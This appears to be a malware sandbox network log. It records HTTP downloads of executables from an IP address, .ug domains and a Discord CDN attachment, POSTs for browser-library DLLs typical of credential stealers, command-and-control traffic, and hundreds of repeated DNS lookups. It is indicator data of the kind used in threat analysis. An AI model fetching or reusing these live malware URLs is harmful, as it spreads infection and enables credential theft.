18.9kB 1.2MB 410 809
HTTP Request
GET http://courtneyjones.ac.ug/zxcvb.exeHTTP Response
200 -
929 B 9.3kB 10 11
HTTP Request
GET https://telete.in/brikitikiHTTP Response
200 -
674.8kB 3.9MB 1778 3068
HTTP Request
POST https://puffpuff423.top/HTTP Response
200HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94HTTP Response
200HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2HTTP Response
200HTTP Request
POST https://puffpuff423.top/HTTP Response
200 -
541 B 399 B 6 4
HTTP Request
POST http://jamesrlongacre.ug/index.phpHTTP Response
200 -
170.9kB 3.1MB 2158 2128
HTTP Request
POST http://morasergiov.ac.ug/softokn3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/sqlite3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/freebl3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/mozglue.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/msvcp140.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/nss3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/vcruntime140.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/main.phpHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/HTTP Response
200 -
35.4kB 2.2MB 761 1480
HTTP Request
GET http://217.8.117.77/ac.exeHTTP Response
200HTTP Request
GET http://217.8.117.77/rc.exeHTTP Response
200HTTP Request
GET http://217.8.117.77/ds1.exeHTTP Response
200HTTP Request
GET http://217.8.117.77/ds2.exeHTTP Response
200 -
156 B 120 B 3 3
-
156 B 120 B 3 3
-
190 B 132 B 4 3
-
162.159.133.233:443https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123tls, httpFcIiEO8Bol.exe20.4kB 627.4kB 434 427
HTTP Request
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123HTTP Response
200 -
156 B 120 B 3 3
-
11.1kB 702.2kB 239 471
HTTP Request
GET http://217.8.117.77/axcjgfhwvvas.exeHTTP Response
200 -
1.1kB 9.5kB 13 15
HTTP Request
GET https://telete.in/brikitikiHTTP Response
200 -
632.9kB 3.9MB 1811 3143
HTTP Request
POST https://puffpuff423.top/HTTP Response
200HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93ccHTTP Response
200HTTP Request
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6HTTP Response
200HTTP Request
POST https://puffpuff423.top/HTTP Response
200 -
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
11.9kB 743.5kB 258 506
HTTP Request
GET http://217.8.117.77/oscjgfhwvvas.exeHTTP Response
200 -
156 B 120 B 3 3
-
8.8kB 531.0kB 189 364
HTTP Request
GET http://217.8.117.77/ac.exeHTTP Response
200 -
541 B 399 B 6 4
HTTP Request
POST http://jamesrlongacre.ug/index.phpHTTP Response
200 -
14.9kB 909.1kB 321 617
HTTP Request
GET http://217.8.117.77/rc.exeHTTP Response
200 -
6.2kB 366.8kB 133 251
HTTP Request
GET http://217.8.117.77/ds1.exeHTTP Response
200 -
156 B 120 B 3 3
-
6.9kB 408.4kB 147 280
HTTP Request
GET http://217.8.117.77/ds2.exeHTTP Response
200 -
156 B 120 B 3 3
-
190 B 132 B 4 3
-
158.8kB 3.1MB 2144 2104
HTTP Request
POST http://morasergiov.ac.ug/softokn3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/sqlite3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/freebl3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/mozglue.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/msvcp140.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/nss3.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/vcruntime140.dllHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/main.phpHTTP Response
200HTTP Request
POST http://morasergiov.ac.ug/HTTP Response
200 -
162.159.133.233:443https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123tls, httpeJZoW1GjJt.exe20.8kB 627.9kB 442 440
HTTP Request
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123HTTP Response
200 -
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
156 B 120 B 3 3
-
52 B 68 B 1 1
DNS Request
bit.do
DNS Response
54.83.52.76
-
58 B 121 B 1 1
DNS Request
pdshcjvnv.ug
-
119 B 245 B 2 2
DNS Request
rbcxvnb.ug
DNS Request
agentpurple.ac.ug
-
56 B 119 B 1 1
DNS Request
zxvbcrt.ug
-
58 B 74 B 1 1
DNS Request
agentt.ac.ug
DNS Response
217.8.117.77
-
65 B 81 B 1 1
DNS Request
courtneyjones.ac.ug
DNS Response
217.8.117.77
-
56 B 72 B 1 1
DNS Request
nicolas.ug
DNS Response
217.8.117.77
-
55 B 71 B 1 1
DNS Request
telete.in
DNS Response
195.201.225.248
-
61 B 109 B 1 1
DNS Request
puffpuff423.top
DNS Response
104.27.132.115104.27.133.115172.67.197.203
-
63 B 79 B 1 1
DNS Request
morasergiov.ac.ug
DNS Response
217.8.117.77
-
63 B 79 B 1 1
DNS Request
jamesrlongacre.ug
DNS Response
217.8.117.77
-
123 B 202 B 2 2
DNS Request
agentttt.ac.ug
DNS Response
79.134.225.40
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.136.232162.159.135.232162.159.128.233162.159.137.232162.159.138.232
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.133.233162.159.135.233162.159.134.233162.159.129.233162.159.130.233
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpurple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
59 B 75 B 1 1
DNS Request
taenaia.ac.ug
DNS Response
185.140.53.149
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
120 B 152 B 2 2
DNS Request
agentttt.ac.ug
DNS Request
agentttt.ac.ug
DNS Response
79.134.225.40
DNS Response
79.134.225.40
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpurple.ac.ug
-
126 B 252 B 2 2
DNS Request
agentpapple.ac.ug
DNS Request
agentpapple.ac.ug
-
63 B 126 B 1 1
DNS Request
agentpapple.ac.ug